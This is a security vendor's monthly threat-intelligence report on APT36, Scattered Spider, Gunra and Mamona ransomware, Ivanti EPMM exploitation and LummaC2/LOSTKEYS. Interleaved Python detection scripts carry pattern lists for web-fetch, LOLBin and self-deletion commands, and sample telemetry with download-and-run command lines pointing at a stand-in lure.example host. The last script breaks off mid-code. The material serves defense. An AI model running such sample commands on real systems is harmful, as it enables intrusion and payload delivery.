Securonix Threat Labs Monthly Intelligence Insights – May 2025

Authors: Nitish Singh, and Nikhil Kumar Chadha

The Monthly Intelligence Insights provides a summary of top threats curated, monitored, and analyzed by Securonix Threat Labs in May 2025. The report additionally provides a synopsis of the threats; indicators of compromise (IoCs); tactics, techniques, and procedures (TTPs); and related tags. Each threat has a comprehensive summary from Threat Labs and search queries from the Threat Research team. For additional information on Threat Labs and related search queries used via Autonomous Threat Sweeper to detect the below-mentioned threats, refer to our Threat Labs home page.

Last month Securonix Autonomous Threat Sweeper identified and analyzed 3,059 TTPs and IoCs, 173 emerging threats, investigated 59 potential threats, and elevated 4 threat incidents. The top data sources swept against include IDS / IPS / UTM / Threat Detection, Data Loss Prevention, Endpoint Management Systems, and Email / Email Security.


Operation Sindoor (APT 36 Activity)

(Originally published in May 2025)

The Autonomous Threat Sweeper team saw heightened activity from the APT36 group in May 2025. Throughout the month, India witnessed a sharp rise in targeted cyber operations linked to Pakistan-based Advanced Persistent Threat (APT) groups, primarily APT36 (Transparent Tribe) and SideCopy, amid escalating geopolitical tensions. The campaigns—ClickFix, Operation Sindoor, and broader hacktivist waves—used spear-phishing, spoofed infrastructure, and malware to infiltrate government, defense, and critical infrastructure sectors.


1. APT36-Linked ClickFix Campaign:

APT36 launched a deceptive campaign spoofing the Indian Ministry of Defence, delivering cross-platform malware using a ClickFix-style social engineering tactic.

  • Infection Chain:
    • Victims were lured via a cloned press release portal (email.gov.in.drdosurvey[.]info).
    • Clicking a malicious “March 2025” link triggered platform-specific payloads:
      • Windows: Delivered a .hta file using mshta.exe, linking to a .NET loader hosted on trade4wealth[.]in.
      • Linux: Executed clipboard-based shell script (mapeal.sh) upon user interaction with a fake CAPTCHA.
  • Payloads:
    • Obfuscated JavaScript (sysinte.hta), dummy image loaders, and eventual delivery of decoy PDFs.


2. Cyber Attacks Following Baisaran Valley Attack:

Following the April 22nd terrorist attack in Pahalgam, cyber aggression intensified against Indian digital assets, with APT36 and pro-Pakistani hacktivist groups actively exploiting the incident as a phishing lure.

  • APT36 Activity:
    • Used themed files like “Report & Update Regarding Pahalgam Terror Attack.ppam” to deliver Crimson RAT.
    • Malicious documents embedded with macros, leading to command-and-control (C2) activity and credential theft.
  • Hacktivist Activity:
    • Groups like HOAX1337, IOK Hacker, and National Cyber Crew carried out DDoS attacks, defacements, and credential harvesting against Indian educational and government sites.

3. Operation Sindoor – Coordinated Cyber Siege

Operation Sindoor represents a strategically coordinated cyber offensive led by APT36 and SideCopy, blending state-sponsored espionage with hacktivism.

  • Key Targets: Indian defense (MoD, DRDO), telecom (BSNL, Jio), healthcare (AIIMS), and government IT infrastructure (NIC, GSTN).
  • Technical TTPs:

    • Initial Access: Spear phishing with malicious .ppam, .lnk, .xlam, and .msi files.
    • Execution: Scripts triggered web queries to fogomyart[.]com, followed by payload delivery from spoofed domains (zohidsindia[.]com, nationaldefensecollege[.]com).
  • Persistence & Evasion:

    • Use of LOLBins, PowerShell obfuscation, UAC bypass, scheduled tasks, and Ares RAT for remote control.
  • Hacktivist Collaboration:

    • 35+ groups conducted DDoS attacks and website defacements under hashtags like #OpIndia and #OperationSindoor via Telegram coordination.


Threat Labs summary

Securonix Threat Labs recommends leveraging our findings to deploy defensive measures against these threat actor groups.

  • Deploy advanced email security gateways capable of inspecting and detonating suspicious attachments (.ppam, .hta, .lnk, .xlam, .msi) in isolated environments. This helps detect macro-based droppers and prevent initial access via phishing.
  • Enforce group policies to restrict abuse of native Windows binaries (LOLBins like mshta.exe, powershell.exe, regsvr32.exe) commonly used in APT36 campaigns. Deploy EDR solutions with script-blocking and behavior analytics capabilities.
  • Update endpoint protection to detect clipboard-based payloads (used in ClickFix) and macro-enabled document behaviors. Monitor unusual clipboard actions and scripting activity triggered by user interaction with phishing pages or CAPTCHA overlays.
  • Immediately block all identified malicious IPs, domains, and file hashes from the campaigns. Implement continuous monitoring for spoofed domains mimicking Indian government infrastructure using DNS filtering and threat intelligence feeds.
  • 139 IoCs are available on our Threat Labs home page repository and have been swept against Autonomous Threat Sweeper customers.


TTPs related to the Operation Sindoor group include but are not limited to the following:

  • Monitor for suspicious file extensions & macros execution
    • Files with extensions: .xlam, .ppam, .lnk, .xlsb, .msi, .pptx.lnk
  • Macro-enabled Office documents triggering:
    • Command and control (C2) communication.
    • Malicious scripts via embedded macros.
    • Web queries using Invoke-WebRequest and wget.
  • Monitor for use of trusted system tools (LOLBins like `mshta.exe` and `rundll32.exe`), obfuscated PowerShell scripts, encoded or compressed payloads, abuse of Task Scheduler for persistence, and methods to bypass User Account Control (UAC) to gain elevated privileges.
  • Monitor for mass login failures or scanning activity.
  • Monitor for DDoS patterns with high traffic from VPS locations (Russia, Germany, Indonesia, Singapore).
  • Monitor website defacements with politically motivated banners or messages.


TTPs related to the Cyber Attacks Following Baisaran Valley Attack include but are not limited to the following:

  • Monitor for emails containing attachments with filenames like: “Report & Update Regarding Pahalgam Terror Attack.ppam” or “Agenda Points of Meeting of Dept of Defence…”
  • Monitor for auto-executing macros (Auto_Open) that:
    • Extract payloads using Shell.Application
    • Use folder paths like \0ffice360-… (note the misleading use of “0” instead of “O”)
    • Copy malicious files and rename system paths.


TTPs related to the APT36-Linked ClickFix Campaign include but are not limited to the following:

  • Monitor for Windows systems executing mshta.exe to run HTA-based payloads retrieved from attacker-controlled URLs.
  • Monitor for payloads tailored separately for Linux (mapeal.sh) and Windows (sysinte.hta) users: the Linux script downloads a JPEG to appear benign, while the Windows script contains obfuscated JavaScript that loads .NET-based malware.
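The three APT36 detection lists above (Office documents spawning script hosts, mshta.exe fetching a remote HTA, Invoke-WebRequest/wget stages, Task Scheduler persistence, the \0ffice360 homoglyph folder and .pptx.lnk double-extension lures) reduce to a handful of rules over process-creation telemetry. The following is an added example, not Securonix code; the events and the .example domains are constructed:

```python
"""Triage Windows process-creation events for the APT36 tradecraft described above.

Added example, not Securonix code. The events at the bottom are constructed;
domains use the reserved .example TLD rather than the campaign's own.
"""
import re
from dataclasses import dataclass

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "rundll32.exe", "regsvr32.exe", "powershell.exe",
                "wscript.exe", "cscript.exe", "cmd.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Office look-alike folder names such as \0ffice360-... (digit zero for the letter O)
HOMOGLYPH_RE = re.compile(r"[\\/]0ffice", re.IGNORECASE)
WEB_FETCH_RE = re.compile(r"invoke-webrequest|\biwr\b|\bwget\b|\bcurl\b", re.IGNORECASE)
SCHTASKS_RE = re.compile(r"schtasks(?:\.exe)?\s+/create", re.IGNORECASE)
# a document extension immediately followed by a lure extension, e.g. Agenda.pptx.lnk
DOUBLE_EXT_RE = re.compile(r"\.\w{2,5}\.(?:lnk|hta|msi|xlam|ppam)\b", re.IGNORECASE)


@dataclass
class ProcEvent:
    parent: str   # parent image name, e.g. powerpnt.exe
    image: str    # child image name
    cmdline: str  # child command line


def triage(ev: ProcEvent) -> list:
    """Return the names of the rules this event trips (empty list = nothing suspicious)."""
    parent, image, cmd = ev.parent.lower(), ev.image.lower(), ev.cmdline
    hits = []
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")      # macro-enabled document executing
    if image == "mshta.exe" and URL_RE.search(cmd):
        hits.append("mshta_remote_hta")               # ClickFix: HTA fetched from a URL
    if image in {"rundll32.exe", "regsvr32.exe"} and URL_RE.search(cmd):
        hits.append("lolbin_remote_url")
    if image in SCRIPT_HOSTS and WEB_FETCH_RE.search(cmd):
        hits.append("script_host_web_fetch")          # Invoke-WebRequest / wget stage
    if SCHTASKS_RE.search(cmd):
        hits.append("scheduled_task_created")         # Task Scheduler persistence
    if HOMOGLYPH_RE.search(cmd):
        hits.append("office_homoglyph_path")          # \0ffice360-... drop folder
    if DOUBLE_EXT_RE.search(cmd):
        hits.append("double_extension_lure")          # .pptx.lnk style lure
    return hits


# Constructed sample telemetry (not from the campaign); the last event is benign.
SAMPLE_EVENTS = [
    ProcEvent("powerpnt.exe", "mshta.exe", "mshta.exe http://lure.example/sysinte.hta"),
    ProcEvent("explorer.exe", "powershell.exe",
              r'powershell.exe -NoP -Command "Invoke-WebRequest http://lure.example/a.ps1 '
              r'-OutFile C:\Users\Public\0ffice360-Upd\a.ps1"'),
    ProcEvent("cmd.exe", "schtasks.exe",
              r"schtasks.exe /create /tn Updater /sc minute /tr C:\Users\Public\u.exe"),
    ProcEvent("explorer.exe", "cmd.exe",
              r'cmd.exe /c start "" "C:\Users\u\Downloads\Agenda Points.pptx.lnk"'),
    ProcEvent("explorer.exe", "notepad.exe", r"notepad.exe C:\Users\u\report.txt"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(f"{ev.parent} -> {ev.image}: {triage(ev) or 'clean'}")
```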


Tags: Threat Actor: APT36, Transparent Tribe, SideCopy, Shadow Battalion | Target Location: India | Threat Actor Location: Pakistan | Target Sector: Government, Defense, Military, Diplomatic, Educational Institutions, Government IT, Healthcare, Telecom, Education | Target Systems: Windows, Linux, Microsoft Office (PowerPoint, Excel), Email Systems, Web Servers, Government Web Portals, Email Servers, Public Services | Delivery Mechanism: ClickFix-style infection chain, Cross-platform social engineering, Website cloning | Attack Vectors: Phishing, Social Engineering, Malicious Documents, Spearphishing Emails, Drive-by Download, Website Defacement, Spear Phishing, DDoS, Credential Harvesting | Tools Used: Crimson RAT, Malicious Macros, Embedded VBA, HTML Redirects | Malware: Crimson RAT, Ares RAT, SideCopy Loader, HTML Credential Phisher


Scattered Spider Activity

(Originally published in May 2025)


Scattered Spider, also known by aliases such as 0ktapus, UNC3944, Octo Tempest, Roasting 0ktapus, and Scatter Swine, is a financially motivated threat actor active since 2022. The group is responsible for a series of high-impact breaches, including those targeting MGM Resorts and Caesars, and has expanded its focus to sectors such as finance, insurance, telecommunications, BPO, retail (especially in the UK and US), food services, gaming, and technology. Known for its role as an access broker rather than a direct ransomware deployer, Scattered Spider enables operations for affiliates like DragonForce and BlackCat.

Their methods of initial access include spearphishing via SMS or Telegram, impersonation of IT personnel, MFA fatigue attacks, and SIM swapping. Once inside, they target cloud platforms such as Azure AD, Microsoft 365, AWS, and Google Workspace. They maintain persistence using tools like AnyDesk, LogMeIn, and ConnectWise, while lateral movement is achieved through public virtual machines, infostealers, and RATs like RattyRAT. Credential theft and data exfiltration are carried out using tools such as Rclone and Dropbox, often paving the way for ransomware deployment by affiliates.

Scattered Spider is adept at evading security defenses, using stolen Microsoft-signed drivers like STONESTOP and POORTRY to disable endpoint detection and response (EDR) systems. They also exploit known vulnerabilities including CVE-2015-2291, CVE-2021-35464, and CVE-2024-37085. Their phishing infrastructure—hosted on low-cost platforms like DigitalOcean and Hostinger—frequently impersonates corporate IT systems (SSO, VPN) with vulgar POST paths and redirects, using TLS certificates from Let’s Encrypt or Sectigo. Campaigns often include AiTM phishing pages, mailbox rule manipulation, abuse of password resets, and residential proxies like NSOCKS and TrueSocks. Believed to be composed of young, native English speakers with links to cybercrime forums like Star Fraud and The Com, the group is suspected to have Eastern European origins and avoids targeting CIS countries.


Threat Labs summary

Securonix Threat Labs recommends leveraging our findings to deploy defensive measures against the Scattered Spider threat group.

  • Replace SMS-based MFA with phishing-resistant methods such as FIDO2 security keys or hardware tokens to prevent credential theft and SIM-swapping attacks exploited by Scattered Spider.
  • Monitor for suspicious login behavior, including MFA fatigue, SIM swapping indicators, and unusual geolocation access.
  • Block unauthorized remote access software (e.g., AnyDesk, LogMeIn, ConnectWise) and use allowlisting for approved tools.
  • Continuously audit for RMM tool usage and privilege escalation attempts, especially those involving driver manipulation or signed malicious binaries.
  • 152 IoCs are available on our Threat Labs home page repository and have been swept against Autonomous Threat Sweeper customers.

Tags: Threat Actor: Scattered Spider, UNC3944 (aka 0ktapus, Roasted Oktapus, Octo Tempest, Scatter Swine, Muddled Libra) | Threat Actor Location: English-speaking, Suspected Eastern Europe; operates in Russian-speaking RaaS ecosystem | Target Location: United States, United Kingdom | Target Sector: Finance, Insurance, Retail, Food Services, Technology, Video Gaming, Telecommunications, Retail & eCommerce, Telecommunications, Cloud Service Providers, Cryptocurrency, Business Process Outsourcing (BPO) | Ransomware: BlackCat/ALPHV, DragonForce


Gunra and Mamona Ransomware Activity

(Originally published in May 2025)


In May 2025, two ransomware threats stood out. Gunra ransomware has significantly expanded its reach through advanced double-extortion tactics against various sectors across multiple countries, including Japan, Egypt, and Italy. Mamona ransomware, on the other hand, operates completely offline, removing the need for command-and-control (C2) servers or data theft.

Gunra is a financially motivated ransomware group first observed in April 2025. The group has rapidly escalated its operations through advanced double-extortion tactics that combine data encryption with the exfiltration of sensitive data to maximize pressure on victims during ransom negotiations. It targets a diverse range of sectors, including real estate, pharmaceuticals, and manufacturing, and has demonstrated a broad geographical impact across Japan, Egypt, Panama, Italy, and Argentina. The ransomware predominantly infects Windows-based environments and leverages advanced anti-analysis and evasion techniques such as process enumeration, debugger detection, and shadow copy deletion through Windows Management Instrumentation (WMI). It uses strong encryption algorithms, appends a [.]ENCRT extension to affected files, and drops a ransom note titled “R3ADM3.txt” in each affected directory. Communication with victims is facilitated through a Tor-based portal. Victims are given a strict five-day deadline, after which they face permanent data loss and public disclosure of exfiltrated information on underground forums. Gunra’s capabilities include evading detection, escalating privileges, and manipulating system processes.

Mamona ransomware represents a notable evolution within the commodity ransomware landscape, diverging from conventional Ransomware-as-a-Service (RaaS) models by operating entirely offline and eliminating the need for command-and-control (C2) infrastructure or data exfiltration. The ransomware was first observed in campaigns linked to BlackLock affiliates with ties to the Embargo group. Mamona employs a custom method to encrypt files with the [.]HAes extension instead of leveraging standard cryptographic libraries such as Windows CryptoAPI or OpenSSL. Notably, it leverages the Windows ping command to introduce execution delays and incorporates a self-deletion routine to reduce forensic traceability. It disseminates ransom notes named “README.HAes.txt” across the system and changes the desktop wallpaper to show that the system has been compromised. The ransomware’s offline operation, combined with the absence of external communication, significantly reduces its visibility to traditional network-based monitoring tools.


Threat Labs summary

Securonix Threat Labs recommends leveraging our findings to deploy protective measures for increased threats from these ransomware campaigns.

  • Enforce strict execution controls via AppLocker or Windows Defender Application Control (WDAC) to block unexpected shell command chains like cmd.exe /c ping && del.
  • Disable or restrict execution from temporary folders and user profile paths, common drop zones for commodity ransomware.
  • Deploy advanced anti-ransomware solutions leveraging behavioral analytics to identify file encryption activities in real time.
  • Activate continuous file protection mechanisms on endpoint systems to monitor for the generation of encrypted files ([.]ENCRT extension) and block unauthorized processes from modifying critical data.
  • Enforce User Account Control (UAC) policies rigorously to restrict unauthorized termination of system processes and prevent privilege escalation attempts.
  • 4 IOCs are available on our Threat Labs home page repository and have been swept against Autonomous Threat Sweeper customers.


TTPs related to the Gunra Ransomware include but are not limited to the following:

  • Monitor for the .ENCRT file extension.
  • Monitor for the ransom note file R3ADM3.txt in every directory.
  • Monitor for gunraransome.exe, which spawns processes visible in Task Manager.
  • Monitor for use of the GetCurrentProcess and TerminateProcess functions, which the ransomware uses for process monitoring, privilege escalation, and injecting malicious code.


TTPs related to the Mamona Ransomware include but are not limited to the following:

  • Monitor for execution of ping 127[.]0[.]0[.]7 or other uncommon loopback IPs as delay tactics.
  • Monitor for self-deletion attempts using cmd.exe /c del /f /q.
  • Monitor for README.HAes.txt and changes to desktop wallpaper.
  • Monitor for .HAes file extension patterns.
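The ping-then-del chain called out above for Mamona (and in the AppLocker recommendation earlier) can be checked from a single process-creation event by splitting the cmd.exe line into its chained commands, rather than matching one literal string. Added example, not Securonix code; the command lines and file paths are constructed:

```python
"""Flag the cmd.exe ping-delay / self-deletion chain listed above for Mamona.

Added example, not Securonix code. Command lines below are constructed; the
127.0.0.7 address is the page's own (defanged there) example.
"""
import ipaddress
import re

LOOPBACK_NET = ipaddress.ip_network("127.0.0.0/8")
STANDARD_LOOPBACK = ipaddress.ip_address("127.0.0.1")
# cmd.exe command separators: &&, ||, & and |
SEPARATOR_RE = re.compile(r"\s*(?:&&|\|\||[&|])\s*")
CMD_WRAPPER_RE = re.compile(r'^\s*"?(?:[a-z]:\\[^"]*\\)?cmd(?:\.exe)?"?\s+/[ck]\s+', re.IGNORECASE)


def split_segments(cmdline: str) -> list:
    """Strip a leading 'cmd.exe /c' and return each chained command as a token list."""
    m = CMD_WRAPPER_RE.match(cmdline)
    body = cmdline[m.end():] if m else cmdline
    return [seg.split() for seg in SEPARATOR_RE.split(body) if seg.strip()]


def _first_ip(tokens):
    for tok in tokens:
        try:
            return ipaddress.ip_address(tok)
        except ValueError:
            continue
    return None


def assess(cmdline: str, image_path: str) -> dict:
    """Findings for one process-creation event: its command line and the image that ran it."""
    findings = {}
    saw_ping = False
    for tokens in split_segments(cmdline):
        verb = tokens[0].lower().rsplit("\\", 1)[-1]
        if verb in ("ping", "ping.exe"):
            saw_ping = True
            ip = _first_ip(tokens[1:])
            # any 127.x.y.z answers locally, but only 127.0.0.1 is what people normally type
            if ip is not None and ip in LOOPBACK_NET and ip != STANDARD_LOOPBACK:
                findings["nonstandard_loopback_ping"] = str(ip)
            if "-n" in tokens and tokens.index("-n") + 1 < len(tokens):
                count = tokens[tokens.index("-n") + 1]
                if count.isdigit():
                    findings["ping_count"] = int(count)   # echo count doubles as a sleep
        elif verb == "del":
            switches = {t.lower() for t in tokens[1:] if t.startswith("/")}
            target = " ".join(t for t in tokens[1:] if not t.startswith("/")).strip('"')
            if {"/f", "/q"} <= switches:
                findings["forced_quiet_delete"] = target
            if saw_ping:
                findings["ping_then_delete"] = True      # delay, then remove a file
            if target.lower() == image_path.lower():
                findings["self_deletion"] = True         # the running binary deletes itself
    return findings


# Constructed (command line, image path) pairs; only the first is the Mamona pattern.
SAMPLE_EVENTS = [
    (r'cmd.exe /c ping 127.0.0.7 -n 3 > nul && del /f /q "C:\Users\u\AppData\Local\Temp\mamona.exe"',
     r"C:\Users\u\AppData\Local\Temp\mamona.exe"),
    (r"ping 127.0.0.1 -n 2", r"C:\Windows\System32\PING.EXE"),
    (r'cmd.exe /c del /q "C:\Users\u\Desktop\old.log"', r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for cmdline, image in SAMPLE_EVENTS:
        print(assess(cmdline, image) or "clean", "<-", cmdline)
```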

Tags: Ransomware Group: Mamona, Gunra Ransomware | Target Country: Japan, Egypt, Panama, Italy, and Argentina | Sector: Real estate, pharmaceuticals, and manufacturing


Ivanti EMM Exploit & Marbled Dust Activity

(Originally published in May 2025)


During this month’s threat activity, a Türkiye-affiliated group known as Marbled Dust was observed exploiting a zero-day vulnerability (CVE-2025-27920) in Output Messenger, a widely used enterprise chat platform. This ongoing campaign, active since April 2024, targets entities in Iraq, particularly those aligned with the Kurdish military. The threat actor likely gains initial access via DNS hijacking or typosquatting and then leverages a directory traversal flaw to deploy a Golang-based backdoor, enabling persistence and command-and-control communication.

Additionally, a China-aligned threat actor was observed exploiting a critical vulnerability chain (CVE-2025-4427 and CVE-2025-4428) in Ivanti Endpoint Manager Mobile (EPMM), targeting critical infrastructure organizations across Europe, North America, and the Asia-Pacific region. The attackers use Java-based exploits to deliver “KrustyLoader,” which then installs a Sliver C2 implant for persistent access. The campaign’s focus is cyber-espionage, including large-scale exfiltration of credentials, Office 365 tokens, and mobile device metadata.

CVE-2025-27920: A directory traversal vulnerability in the Output Messenger Server Manager application. It allows an authenticated attacker to upload arbitrary files to the server’s startup directory. Marbled Dust exploited this as a zero-day to drop a malicious VBScript (OMServerService.vbs), establishing persistence on the compromised server. The vendor, Srimax, has released a patch to address this flaw.

CVE-2025-4427: An authentication bypass vulnerability affecting Ivanti Endpoint Manager Mobile (EPMM). According to the report, it is the initial vulnerability in a two-part attack chain. On its own, it allows an attacker to circumvent authentication controls. In the observed campaign, a China-nexus actor uses it in conjunction with CVE-2025-4428 to enable unauthenticated remote code execution.

CVE-2025-4428: A code injection vulnerability in Ivanti EPMM. It is the second component of the attack chain and enables remote code execution. The China-nexus actor was observed exploiting this flaw by injecting Java-based commands into the format= parameter of a GET request to the /mifs/rs/api/v2/ endpoint. When chained with the CVE-2025-4427 authentication bypass, this vulnerability allows for completely unauthenticated RCE.


Threat Labs summary

Securonix Threat Labs recommends leveraging our findings to deploy protective measures for increased threats from these vulnerabilities.

  • Immediately update Output Messenger to a version not affected by the vulnerability: Windows (Version 2.0.63) and Server (Version 2.0.62)
  • Implement phishing-resistant authentication for critical applications using Entra ID Conditional Access.
  • Immediately apply the patches released by Ivanti to address vulnerabilities CVE-2025-4427 and CVE-2025-4428 in Ivanti EPMM.
  • Enable the Attack Surface Reduction (ASR) rule to “Block executable files from running unless they meet a prevalence, age, or trusted list criterion.”
  • 10 IoCs are available on our Threat Labs home page repository and have been swept against Autonomous Threat Sweeper customers.


TTPs related to Marbled Dust include but are not limited to the following:

  • Monitor for directory traversal attempts in file upload requests that indicate exploitation of the Output Messenger vulnerability (CVE-2025-27920).
  • Monitor for the creation of malicious VBScript files, such as OMServerService.vbs or OM.vbs, within the Windows Startup folder.
  • Monitor for the execution of a GoLang backdoor named OMServerService.exe, especially when it runs from the C:\Users\public\videos\ directory.
  • Monitor for the legitimate chat client process, OMClientService.exe, spawning cmd.exe to execute commands received from a C2 server.
  • Monitor for the use of plink.exe, the command-line PuTTY client, which the actor uses to create SSH tunnels for data exfiltration.
  • Monitor for the sudden creation of large .rar archive files on user desktops, as this technique is used for staging data before theft.


TTPs related to the Chinese Threat Actor Exploiting Ivanti EMM Vulnerability include but are not limited to the following:

  • Monitor for the web server process, such as Java or Tomcat, spawning unexpected child processes like /bin/bash, wget, curl, or fetch.
  • Monitor for any files being downloaded to temporary directories like /tmp/ or /var/tmp/, followed by permission changes (chmod +x) and execution.
  • Monitor for the malicious use of legitimate system tools, including mysqldump for database dumping and jcmd for process memory dumping.
  • Monitor for any processes attempting to read sensitive configuration files, such as .mifpp or .spp2, to access hardcoded credentials.
  • Monitor for command output being written to files that are masquerading as images, such as .jpg files located in web-accessible directories.
  • Monitor for the download and execution of reverse proxy tools like FRP (frpc), which are used to establish a persistent C2 tunnel.
  • Monitor for signs of process injection or anomalous memory usage, as the final Sliver payload is designed to be executed directly in memory.
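Because CVE-2025-4428 is triggered through the format= parameter of a GET request to /mifs/rs/api/v2/, the request shape is visible in ordinary web-server access logs before any of the post-exploitation activity listed above (child processes of Tomcat, /tmp drops, frpc) occurs. Added example, not Securonix's or Ivanti's code; the sub-path /mifs/rs/api/v2/example, the json/xml allowlist and the log lines are assumptions constructed for the demo:

```python
"""Scan web-server access logs for requests shaped like the EPMM exploit chain above.

Added example, not Securonix's or Ivanti's code. The allowlist of expected
format= values and the sub-path under /mifs/rs/api/v2/ are assumptions for the
demo; the log lines are constructed (combined log format).
"""
import re
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
API_PREFIX = "/mifs/rs/api/v2/"
EXPECTED_FORMATS = {"json", "xml"}          # assumed benign selector values
# template/expression syntax has no business in a format selector
EXPRESSION_RE = re.compile(r"\$\{|#\{|\w+\(|[;`|]")


def inspect_line(line: str) -> Optional[dict]:
    """Return a finding dict for a request to the EPMM API, or None for other lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    if not parts.path.startswith(API_PREFIX):
        return None
    # parse_qs decodes once; a second unquote catches double-encoded values
    raw = parse_qs(parts.query, keep_blank_values=True).get("format", [])
    values = [unquote(v) for v in raw]
    reasons = []
    for v in values:
        if v.lower() not in EXPECTED_FORMATS:
            reasons.append("unexpected_format_value")
        if EXPRESSION_RE.search(v):
            reasons.append("expression_syntax_in_format")
        if len(v) > 32:
            reasons.append("overlong_format_value")
    return {"ip": m["ip"], "path": parts.path, "status": int(m["status"]),
            "format": values, "reasons": sorted(set(reasons))}


def suspicious(lines) -> list:
    """Findings with at least one reason, across a batch of log lines."""
    out = []
    for line in lines:
        f = inspect_line(line)
        if f and f["reasons"]:
            out.append(f)
    return out


# Constructed sample lines; 203.0.113.0/24 is a documentation range, and the
# "${placeholder()}" value stands in for the expression syntax, not a real payload.
SAMPLE_LOG = [
    '10.0.0.5 - - [15/May/2025:10:01:12 +0000] "GET /mifs/rs/api/v2/example?format=json HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [15/May/2025:10:02:40 +0000] "GET /mifs/rs/api/v2/example?format=%24%7Bplaceholder%28%29%7D HTTP/1.1" 200 198 "-" "curl/8.0"',
    '10.0.0.7 - - [15/May/2025:10:03:05 +0000] "GET /mifs/login.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in suspicious(SAMPLE_LOG):
        print(f"{f['ip']} {f['path']} format={f['format']} -> {', '.join(f['reasons'])}")
```

A hit on the second line is worth correlating with the process-level signals in the list above (Tomcat spawning a shell, a new file in /tmp made executable) from the same host and time window.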


Tags: Threat Actor: Marbled Dust, Sea Turtle, UNC1326, China-nexus Espionage Group | Vulnerabilities: CVE-2025-27920, CVE-2025-27921, CVE-2025-4427, CVE-2025-4428 | Malware: GoLang Backdoor, VBScript, KrustyLoader, Sliver, Auto-Color | Tools: Output Messenger, plink.exe (PuTTY), Ivanti EPMM, FRP (Fast Reverse Proxy), wget, curl, fetch, jcmd, mysqldump | Target Sectors: Government, Military, Telecommunications, Information Technology, Healthcare, Finance | Geolocation: Iraq, Middle East, Europe, North America, Asia-Pacific, China


LUMMAC.V2 and LOSTKEYS Used in Targeted Attacks

(Originally published in May 2025)


LummaC2, also known as Lummastealer or LUMMAC.V2, is a sophisticated C++ based infostealer first observed on Russian-language forums in 2022. It poses a significant threat, particularly to U.S. critical infrastructure, by targeting a wide range of sensitive data, including financial credentials, multi-factor authentication (MFA) details, cryptocurrency wallets, email clients, and password managers.

Primarily distributed through social engineering tactics like phishing emails and “ClickFix” CAPTCHA lures, LummaC2 tricks users into executing malicious PowerShell scripts disguised as legitimate software. To remain undetected, it employs an advanced arsenal of evasion techniques, including:

  • Stealthy Execution: Operating in-memory to minimize forensic traces, using process hollowing and DLL hijacking.
  • Defense Evasion: Incorporating anti-debugging, sandbox detection, and obfuscation to bypass EDR and antivirus solutions.
  • Persistence: Modifying registry keys to maintain its presence on an infected system.

Once active, the malware fingerprints the system and communicates with its command-and-control (C2) servers using encrypted POST requests, often shielded by Cloudflare. Its modular design allows attackers to issue commands for data theft, remote file execution, screenshot capture, and self-deletion. All stolen data is packaged into ZIP archives before being exfiltrated.

LOSTKEYS is newly identified malware deployed by the Russian state-sponsored threat group COLDRIVER (also known as UNC4057, Star Blizzard, or Callisto), marking a significant shift from its traditional credential phishing operations to direct malware deployment. Aimed at high-profile Western targets including government advisors, military personnel, NGOs, journalists, and individuals connected to Ukraine, the malware supports Russia’s cyberespionage objectives. Delivered through a multi-stage infection chain beginning with a fake CAPTCHA site that tricks users into executing PowerShell commands (the “ClickFix” technique), LOSTKEYS evades detection using display resolution hash checks and employs a Base64-encoded PowerShell script to download a VBS decoder and a uniquely encrypted payload. Once active, the malware steals documents, system information, and running process data.


Threat Labs summary

Securonix Threat Labs recommends leveraging our findings to deploy defensive measures against these malware threats.

  • Implement least privilege access controls across all user accounts and disable PowerShell for non-administrative users. Regularly audit system and registry changes to identify unauthorized persistence mechanisms, and leverage behavioral analytics to detect abnormal application behavior and suspicious network activity.
  • Use endpoint protection tools or group policies to block the execution of unauthorized PowerShell scripts, MSHTA commands, and AutoIt binaries.
  • Additionally, configure enterprise systems to block or restrict script-based command execution—particularly from untrusted sources—by default. Enforce least privilege principles to prevent users from performing administrative actions that could be exploited by malware such as LOSTKEYS.
  • Use application allowlisting to prevent untrusted executables or scripts from running, especially from %APPDATA%, %TEMP%, or %LOCALAPPDATA% directories—common paths used by LUMMAC.V2 loaders.
  • Deploy network-based detection rules to flag traffic matching LUMMAC.V2’s known C2 patterns (act=life, act=send_message) and inspect outbound ZIP uploads or unrecognized TLS sessions.
  • 136 IoCs are available on our Threat Labs home page repository and have been swept against Autonomous Threat Sweeper customers.


TTPs related to LummaC2/LUMMAC.V2 include but are not limited to the following:

  • Monitor for execution of obfuscated PowerShell commands, PowerShell invoking web requests or downloading executables/scripts, and PowerShell processes running without a visible window (-WindowStyle Hidden).
  • Monitor for creation or modification of Run/RunOnce keys in the Windows Registry, and for unexpected startup entries or scripts set to execute on boot/login.
  • Monitor for PowerShell processes with -W Hidden or Invoke-WebRequest followed by Invoke-Expression (iex)—indicating fileless payload execution.
  • Monitor for AutoIt scripts or batch files executing binaries with .a3x, .pif, or .bat extensions.
  • Monitor for Registry modifications under: powershell.exe → setup.exe → <malicious DLL>
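The -W Hidden / -WindowStyle Hidden and Invoke-WebRequest-then-iex patterns above are easy to miss because powershell.exe accepts abbreviated parameter names and base64-wrapped scripts. This added example (not Securonix code) normalises a command line before matching; the sample command lines and the .example URLs are constructed:

```python
"""Normalise powershell.exe command lines to catch the LummaC2 patterns listed above.

Added example, not Securonix code; the sample command lines are constructed.
powershell.exe accepts any unambiguous prefix of a parameter name (-W, -Win and
-WindowStyle are one switch; -e, -ec and -enc all mean -EncodedCommand).
"""
import base64
import re

CANONICAL = ["windowstyle", "encodedcommand", "executionpolicy",
             "noprofile", "noninteractive", "command", "file"]
# prefixes that would be ambiguous on paper but that powershell.exe resolves explicitly
OVERRIDES = {"e": "encodedcommand", "ec": "encodedcommand", "ep": "executionpolicy"}
TOKEN_RE = re.compile(r'"[^"]*"|\S+')
# a web fetch whose result reaches Invoke-Expression (or its alias iex)
DOWNLOAD_EXEC_RE = re.compile(
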